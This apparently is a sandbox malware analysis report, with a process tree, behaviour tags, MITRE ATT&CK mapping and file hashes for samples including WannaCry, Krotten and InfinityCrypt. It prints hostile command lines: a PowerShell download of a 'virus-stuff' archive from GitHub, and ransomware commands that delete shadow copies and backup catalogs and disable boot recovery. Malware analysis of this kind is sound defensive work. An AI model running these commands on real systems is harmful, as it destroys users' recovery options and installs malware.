  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6344 /prefetch:1
  2⤵
  PID:1476
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6688 /prefetch:1
  2⤵
  PID:2800
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2672 /prefetch:1
  2⤵
  PID:4540
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5928 /prefetch:1
  2⤵
  PID:4180
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5008 /prefetch:1
  2⤵
  PID:676
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3912 /prefetch:1
  2⤵
  PID:4976
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5860 /prefetch:1
  2⤵
  PID:3936
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6616 /prefetch:1
  2⤵
  PID:2444
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5908 /prefetch:1
  2⤵
  PID:4496
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5692 /prefetch:1
  2⤵
  PID:4968
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6668 /prefetch:1
  2⤵
  PID:3488
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5900 /prefetch:1
  2⤵
  PID:4768
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5168 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4616
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3184 /prefetch:1
  2⤵
  PID:4360
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6032 /prefetch:1
  2⤵
  PID:1000
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5988 /prefetch:1
  2⤵
  PID:3164
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5616 /prefetch:1
  2⤵
  PID:2496
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5896 /prefetch:1
  2⤵
  PID:2080
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5704 /prefetch:8
  2⤵
  PID:2092
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6356 /prefetch:1
  2⤵
  PID:2128
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6620 /prefetch:1
  2⤵
  PID:3124
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3564 /prefetch:1
  2⤵
  PID:3656
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5728 /prefetch:1
  2⤵
  PID:4572
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5836 /prefetch:1
  2⤵
  PID:4396
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5436 /prefetch:1
  2⤵
  PID:4416
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5976 /prefetch:1
  2⤵
  PID:3596
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6308 /prefetch:1
  2⤵
  PID:2732
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6312 /prefetch:1
  2⤵
  PID:3760
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2596 /prefetch:1
  2⤵
  PID:1412
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3468 /prefetch:1
  2⤵
  PID:3696
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6004 /prefetch:1
  2⤵
  PID:640
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1120 /prefetch:1
  2⤵
  PID:772
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6832 /prefetch:8
  2⤵
  PID:2372
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6404 /prefetch:8
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:4808
- C:\Users\Admin\Downloads\robux.exe
  "C:\Users\Admin\Downloads\robux.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3776
- - C:\Windows\system32\cmd.exe
    "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B478.tmp\B479.tmp\B47A.bat C:\Users\Admin\Downloads\robux.exe"
    3⤵
    PID:3412
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1620
  - - C:\Windows\system32\timeout.exe
      timeout /t 10 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4500
  - - C:\Windows\system32\timeout.exe
      timeout /t 20 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:3156
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5740 /prefetch:8
  2⤵
  PID:3748
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:1
  2⤵
  PID:1356
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6856 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:4336
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\free bobux.bat" "
  2⤵
  PID:3460
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2104
- - C:\Windows\system32\timeout.exe
    timeout /t 3 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:2296
- - C:\Windows\system32\timeout.exe
    timeout /t 10 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:4696
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
  2⤵
  PID:4556
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5900 /prefetch:8
  2⤵
  PID:3692
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2936 /prefetch:8
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:2204
- C:\Users\Admin\Downloads\InfinityCrypt.exe
  "C:\Users\Admin\Downloads\InfinityCrypt.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Checks processor information in registry
  - Suspicious use of AdjustPrivilegeToken
  PID:3048
- C:\Users\Admin\Downloads\InfinityCrypt.exe
  "C:\Users\Admin\Downloads\InfinityCrypt.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Checks processor information in registry
  - Suspicious use of AdjustPrivilegeToken
  PID:2064
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6884 /prefetch:1
  2⤵
  PID:3280
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6456 /prefetch:8
  2⤵
  PID:4724
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5844 /prefetch:8
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:1920
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5648 /prefetch:1
  2⤵
  PID:4744
- C:\Users\Admin\Downloads\Krotten.exe
  "C:\Users\Admin\Downloads\Krotten.exe"
  2⤵
  - Disables RegEdit via registry modification
  - Executes dropped EXE
  - Adds Run key to start application
  - Modifies WinLogon
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Modifies Control Panel
  - Modifies Internet Explorer settings
  - Modifies Internet Explorer start page
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - System policy modification
  PID:2960
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6024 /prefetch:1
  2⤵
  PID:1332
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5392 /prefetch:8
  2⤵
  PID:1704
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5428 /prefetch:8
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:4724
- C:\Users\Admin\Downloads\WannaCry.exe
  "C:\Users\Admin\Downloads\WannaCry.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  PID:4948
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 224941737400355.bat
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4420
  - - C:\Windows\SysWOW64\cscript.exe
      cscript //nologo c.vbs
      4⤵
      System Location Discovery: System Language Discovery
      PID:2372
- - C:\Users\Admin\Downloads\!WannaDecryptor!.exe
    !WannaDecryptor!.exe f
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:1700
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im MSExchange*
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3032
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im Microsoft.Exchange.*
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:112
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im sqlserver.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3280
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im sqlwriter.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3792
- - C:\Users\Admin\Downloads\!WannaDecryptor!.exe
    !WannaDecryptor!.exe c
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:2028
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c start /b !WannaDecryptor!.exe v
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2300
  - - C:\Users\Admin\Downloads\!WannaDecryptor!.exe
      !WannaDecryptor!.exe v
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:4008
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3924
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic shadowcopy delete
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3728
- - C:\Users\Admin\Downloads\!WannaDecryptor!.exe
    !WannaDecryptor!.exe
    3⤵
    - Executes dropped EXE
    - Sets desktop wallpaper using registry
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:1508

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4996

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2104

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3888

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\icudtl.dat.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C

Filesize
16B

MD5
944081fdae480daf2951622f98b7afc8

SHA1
5878d64a428c5a2880123e1b331023b68e3c1008

SHA256
2d7fe8ba8deb53fb830f6d7714c27b86ad6c6ea85e34a61ab4cc5e97179df249

SHA512
bc5f9e7b33623edf5688862d69f9d9cb4ee336ce22d4e6919e69f26c1fdadb7f8b287e3c7a69d610653b9aa3c8cb2318aa956562d2248c5d98fa5ca6aea45365

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_remove_18.svg.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C

Filesize
720B

MD5
db3bd43c9b4a8cc312aeb722f0a03aea

SHA1
5f1db6331b8c583f9cb8875635b1f718aed96f39

SHA256
b306d23cc0f958979aa0dd7879437da062d8ca1eec0dcb8db383eb9412ef7909

SHA512
8573a2ed440ce326568f83f0b5a985681acadd4ed53ee5b8268bca042beed029471806645a1a6742b98657bb56c4f49ae8746ecf6f022bc7550960f3df2003c9

Download Submit
